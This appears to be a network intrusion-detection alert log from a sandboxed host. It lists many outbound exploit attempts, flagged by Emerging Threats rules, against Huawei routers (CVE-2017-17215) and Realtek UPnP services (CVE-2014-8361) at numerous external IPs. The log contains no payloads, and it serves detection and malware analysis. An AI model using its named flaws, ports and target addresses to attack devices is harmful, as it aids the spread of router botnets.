                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.23197.20.163.179
                                      07/20/24-23:01:45.134490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5705452869192.168.2.23186.231.211.62
                                      07/20/24-23:01:47.275716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5454852869192.168.2.2335.223.49.101
                                      07/20/24-23:00:59.154068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250037215192.168.2.23197.58.83.134
                                      07/20/24-23:01:27.650643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068037215192.168.2.2341.32.198.246
                                      07/20/24-23:01:56.378726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614043252869192.168.2.23175.65.204.131
                                      07/20/24-23:01:42.563729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5940052869192.168.2.23104.27.90.68
                                      07/20/24-23:01:21.937814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251237215192.168.2.23157.251.195.250
                                      07/20/24-23:01:42.928503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615985852869192.168.2.23167.230.66.89
                                      07/20/24-23:01:43.020186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614086052869192.168.2.2332.76.174.48
                                      07/20/24-23:01:43.874054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3708852869192.168.2.23162.100.122.131
                                      07/20/24-23:01:00.633744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980637215192.168.2.23197.99.9.223
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731037215192.168.2.2313.170.167.126
                                      07/20/24-23:01:08.571946TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25621452869192.168.2.2394.221.100.187
                                      07/20/24-23:01:26.120876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538452869192.168.2.23143.157.68.18
                                      07/20/24-23:01:08.575986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3464052869192.168.2.2325.158.237.150
                                      07/20/24-23:01:31.314906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5743052869192.168.2.2385.173.195.222
                                      07/20/24-23:00:57.222279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860237215192.168.2.23157.10.69.196
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237437215192.168.2.2361.78.107.95
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381237215192.168.2.2341.233.32.110
                                      07/20/24-23:01:43.724924TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25028452869192.168.2.23155.182.30.66
                                      07/20/24-23:01:34.060991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990437215192.168.2.23197.225.60.182
                                      07/20/24-23:01:46.462339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4153452869192.168.2.23125.67.244.75
                                      07/20/24-23:01:01.367078TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4804252869192.168.2.2354.250.134.170
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264637215192.168.2.23197.182.219.57
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805037215192.168.2.2379.94.2.62
                                      07/20/24-23:01:20.169339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545837215192.168.2.23223.241.109.88
                                      07/20/24-23:01:45.489343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4645252869192.168.2.2350.90.160.227
                                      07/20/24-23:01:51.275864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473452869192.168.2.2337.189.26.199
                                      07/20/24-23:01:53.309955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4165052869192.168.2.23195.166.157.114
                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240237215192.168.2.23220.206.255.62
                                      07/20/24-23:01:02.755930TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614405652869192.168.2.2338.158.187.83
                                      07/20/24-23:01:07.022763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079837215192.168.2.23197.243.97.104
                                      07/20/24-23:01:52.388926TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24320652869192.168.2.23147.248.255.23
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095037215192.168.2.2341.85.182.81
                                      07/20/24-23:01:08.659435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5183252869192.168.2.2378.39.181.117
                                      07/20/24-23:00:57.220983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.23157.37.107.134
                                      07/20/24-23:01:42.898615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.23142.238.177.84
                                      07/20/24-23:01:41.522990TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615374652869192.168.2.23146.0.35.148
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249637215192.168.2.23157.145.57.110
                                      07/20/24-23:01:04.053605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635837215192.168.2.23118.207.69.207
                                      07/20/24-23:01:02.065822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4928252869192.168.2.2370.239.61.12
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317437215192.168.2.23197.121.129.192
                                      07/20/24-23:01:31.325400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442852869192.168.2.23118.217.116.132
                                      07/20/24-23:01:07.114267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855837215192.168.2.23157.73.211.6
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867637215192.168.2.2331.249.51.37
                                      07/20/24-23:01:11.631728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321837215192.168.2.23167.41.22.33
                                      07/20/24-23:01:41.286911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5691052869192.168.2.23174.56.140.249
                                      07/20/24-23:01:44.862542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4499052869192.168.2.23169.129.60.246
                                      07/20/24-23:01:40.279669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379837215192.168.2.23197.215.73.79
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889037215192.168.2.23196.254.2.2
                                      07/20/24-23:01:25.002144TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4179652869192.168.2.23178.214.207.137
                                      07/20/24-23:01:46.146350TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24711052869192.168.2.23183.90.49.252
                                      07/20/24-23:01:52.428503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308652869192.168.2.2352.24.218.23
                                      07/20/24-23:01:43.035756TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3881052869192.168.2.23152.70.166.60
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809637215192.168.2.23213.187.250.71
                                      07/20/24-23:01:44.280821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5025452869192.168.2.234.66.151.191
                                      07/20/24-23:01:44.175701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3873052869192.168.2.23190.104.185.79
                                      07/20/24-23:01:04.142086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5726252869192.168.2.23175.24.153.194
                                      07/20/24-23:01:45.175511TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25248852869192.168.2.2399.207.71.238
                                      07/20/24-23:01:11.818842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505237215192.168.2.2341.84.101.199
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788637215192.168.2.23157.155.110.53
                                      07/20/24-23:01:02.716646TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614633852869192.168.2.23210.116.25.221
                                      07/20/24-23:01:43.977046TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615096852869192.168.2.23141.217.152.223
                                      07/20/24-23:01:40.285038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255437215192.168.2.2399.254.210.2
                                      07/20/24-23:01:47.503890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4489652869192.168.2.23209.24.146.250
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013237215192.168.2.2385.72.21.57
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737637215192.168.2.2341.201.122.237
                                      07/20/24-23:01:55.802130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614996452869192.168.2.2369.58.59.239
                                      07/20/24-23:01:45.933452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5103252869192.168.2.2379.95.218.159
                                      07/20/24-23:01:00.648489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.23157.21.145.183
                                      07/20/24-23:01:41.456456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615162452869192.168.2.23131.22.29.107
                                      07/20/24-23:01:55.428221TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5545052869192.168.2.23180.191.130.65
                                      07/20/24-23:01:14.100332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806637215192.168.2.2341.200.152.219
                                      07/20/24-23:01:08.630327TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23407852869192.168.2.23195.64.245.14
                                      07/20/24-23:01:13.282996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5750052869192.168.2.23211.27.252.180
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619637215192.168.2.23197.78.152.186
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839037215192.168.2.23197.171.117.24
                                      07/20/24-23:01:34.044417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.2341.118.41.79
                                      07/20/24-23:01:43.054762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3294452869192.168.2.2385.15.162.89
                                      07/20/24-23:01:41.463722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614660452869192.168.2.23204.152.123.98
                                      07/20/24-23:01:41.303421TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615049252869192.168.2.2368.175.73.118
                                      07/20/24-23:01:43.621955TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25932452869192.168.2.23157.142.102.71
                                      07/20/24-23:01:07.005156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490237215192.168.2.23197.119.197.200
                                      07/20/24-23:01:42.608320TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23849652869192.168.2.23220.210.17.223
                                      07/20/24-23:01:52.582295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3555252869192.168.2.2381.110.138.235
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159637215192.168.2.23157.221.87.32
                                      07/20/24-23:01:44.565132TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5728252869192.168.2.23112.138.84.14
                                      07/20/24-23:01:14.060998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885837215192.168.2.23197.31.217.253
                                      07/20/24-23:01:55.154049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4395052869192.168.2.23125.58.232.126
                                      07/20/24-23:01:32.039719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625437215192.168.2.23197.178.133.102
                                      07/20/24-23:01:43.921490TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25253852869192.168.2.2348.218.79.196
                                      07/20/24-23:01:41.392527TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615668652869192.168.2.239.196.233.159
                                      07/20/24-23:01:41.676253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24459452869192.168.2.2349.9.206.193
                                      07/20/24-23:01:42.608320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4746852869192.168.2.23163.212.66.23
                                      07/20/24-23:01:00.633742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.23197.74.184.130
                                      07/20/24-23:01:02.724151TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614174652869192.168.2.23115.161.142.144
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.23197.194.145.174
                                      07/20/24-23:01:08.659435TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23971052869192.168.2.2325.108.103.192
                                      07/20/24-23:01:49.456461TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25187652869192.168.2.23203.13.28.171
                                      07/20/24-23:01:49.084300TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24049652869192.168.2.23138.199.35.177
                                      07/20/24-23:01:57.885722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524052869192.168.2.2399.190.226.142
                                      07/20/24-23:01:31.320679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25777452869192.168.2.2345.144.124.12
                                      07/20/24-23:01:31.975158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5830637215192.168.2.23157.186.3.56
                                      07/20/24-23:01:58.624224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26047452869192.168.2.23188.52.23.162
                                      07/20/24-23:01:42.631864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24737252869192.168.2.23191.177.238.243
                                      07/20/24-23:01:08.672944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589052869192.168.2.2391.10.179.128
                                      07/20/24-23:01:49.555689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615284852869192.168.2.23134.217.248.188
                                      07/20/24-23:01:51.354418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453452869192.168.2.23152.150.124.219
                                      07/20/24-23:02:09.148759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24477852869192.168.2.2380.223.189.233
                                      07/20/24-23:01:42.262355TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615741252869192.168.2.23129.65.153.68
                                      07/20/24-23:01:52.934726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4699052869192.168.2.23139.163.81.215
                                      07/20/24-23:01:31.982478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355237215192.168.2.23197.121.218.24
                                      07/20/24-23:02:09.668312TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614584252869192.168.2.23175.222.148.23
                                      07/20/24-23:01:08.646615TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25466452869192.168.2.23150.181.42.248
                                      07/20/24-23:01:11.636425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382037215192.168.2.23197.83.57.75
                                      07/20/24-23:01:43.173843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4733452869192.168.2.23129.145.211.206
                                      07/20/24-23:01:52.482723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5816252869192.168.2.23184.162.52.201
                                      07/20/24-23:01:41.303669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614197852869192.168.2.23184.207.38.235
                                      07/20/24-23:01:52.038834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24504852869192.168.2.2318.71.115.72
                                      07/20/24-23:01:34.062277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801437215192.168.2.23195.17.33.203
                                      07/20/24-23:01:04.094795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516237215192.168.2.23157.87.142.177
                                      07/20/24-23:01:49.207937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886052869192.168.2.2368.37.23.19
                                      07/20/24-23:01:01.320095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613439852869192.168.2.2327.254.228.216
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233237215192.168.2.23157.87.66.233
                                      07/20/24-23:01:42.501090TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23597052869192.168.2.2318.13.209.238
                                      07/20/24-23:01:04.039129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286637215192.168.2.23157.100.128.69
                                      07/20/24-23:01:09.030401TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608452869192.168.2.23184.60.97.199
                                      07/20/24-23:01:50.418920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4785252869192.168.2.2361.169.73.117
                                      07/20/24-23:01:44.274940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4492452869192.168.2.2339.205.206.142
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3475437215192.168.2.2341.24.39.230
                                      07/20/24-23:01:44.250892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6094852869192.168.2.23137.66.212.197
                                      07/20/24-23:01:11.818842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060437215192.168.2.23197.189.13.100
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516437215192.168.2.2341.244.169.9
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081037215192.168.2.23157.45.76.10
                                      07/20/24-23:01:46.871315TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24742252869192.168.2.23196.221.214.48
                                      07/20/24-23:01:41.722890TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24496452869192.168.2.23141.137.71.180
                                      07/20/24-23:02:04.133788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615783052869192.168.2.23166.75.101.81
                                      07/20/24-23:01:47.798104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225252869192.168.2.2313.59.59.107
                                      07/20/24-23:01:43.167781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246652869192.168.2.23212.16.123.155
                                      07/20/24-23:01:04.039128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3354637215192.168.2.23178.223.125.30
                                      07/20/24-23:01:58.885082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4228452869192.168.2.23176.234.87.122
                                      07/20/24-23:01:04.423031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614358452869192.168.2.23186.40.176.32
                                      07/20/24-23:01:10.775483TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4303252869192.168.2.23144.152.137.9
                                      07/20/24-23:01:47.873078TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25195252869192.168.2.2393.25.182.143
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491637215192.168.2.23157.84.55.40
                                      07/20/24-23:01:54.808195TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3369252869192.168.2.2363.248.77.62
                                      07/20/24-23:01:41.501891TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5377452869192.168.2.23212.24.31.41
                                      07/20/24-23:01:51.562834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312852869192.168.2.23157.184.119.75
                                      07/20/24-23:01:44.392836TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5689652869192.168.2.2394.208.23.95
                                      07/20/24-23:01:48.275988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613973252869192.168.2.2389.150.205.193
                                      07/20/24-23:01:34.060991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528637215192.168.2.23197.0.183.138
                                      07/20/24-23:01:06.991143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508837215192.168.2.2341.134.186.139
                                      07/20/24-23:02:37.919900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3597852869192.168.2.23152.191.160.62
                                      07/20/24-23:01:48.986585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24971452869192.168.2.2332.103.164.103
                                      07/20/24-23:01:41.383579TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4346852869192.168.2.23126.224.156.29
                                      07/20/24-23:01:43.062246TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5470452869192.168.2.23142.238.177.84
                                      07/20/24-23:02:10.069241TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23728452869192.168.2.23152.191.160.62
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673437215192.168.2.23157.160.251.29
                                      07/20/24-23:01:51.124824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3531052869192.168.2.23208.210.235.23
                                      07/20/24-23:01:08.597662TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23671052869192.168.2.23208.190.62.115
                                      07/20/24-23:01:43.580365TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5599052869192.168.2.2394.120.34.76
                                      07/20/24-23:01:43.642551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634852869192.168.2.23114.55.77.0
                                      07/20/24-23:01:47.267254TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615113652869192.168.2.2393.186.61.171
                                      07/20/24-23:01:01.443835TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615238452869192.168.2.2390.243.193.156
                                      07/20/24-23:01:46.220244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3729252869192.168.2.23117.120.22.241
                                      07/20/24-23:01:44.085493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616051452869192.168.2.23104.158.63.237
                                      07/20/24-23:01:34.044417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470637215192.168.2.23202.243.3.110
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058437215192.168.2.23157.58.18.134
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859837215192.168.2.23157.122.28.196
                                      07/20/24-23:02:09.263272TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381652869192.168.2.23210.49.56.86
                                      07/20/24-23:01:25.302531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614941052869192.168.2.23125.53.48.130
                                      07/20/24-23:01:31.318206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966652869192.168.2.23154.90.91.204
                                      07/20/24-23:01:44.749294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25586852869192.168.2.23169.186.230.20
                                      07/20/24-23:01:43.014738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614404852869192.168.2.2349.238.106.168
                                      07/20/24-23:01:01.852700TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5004452869192.168.2.23106.250.20.58
                                      07/20/24-23:01:44.464382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6082452869192.168.2.2389.81.144.22
                                      07/20/24-23:01:47.943232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24386252869192.168.2.23213.170.177.158
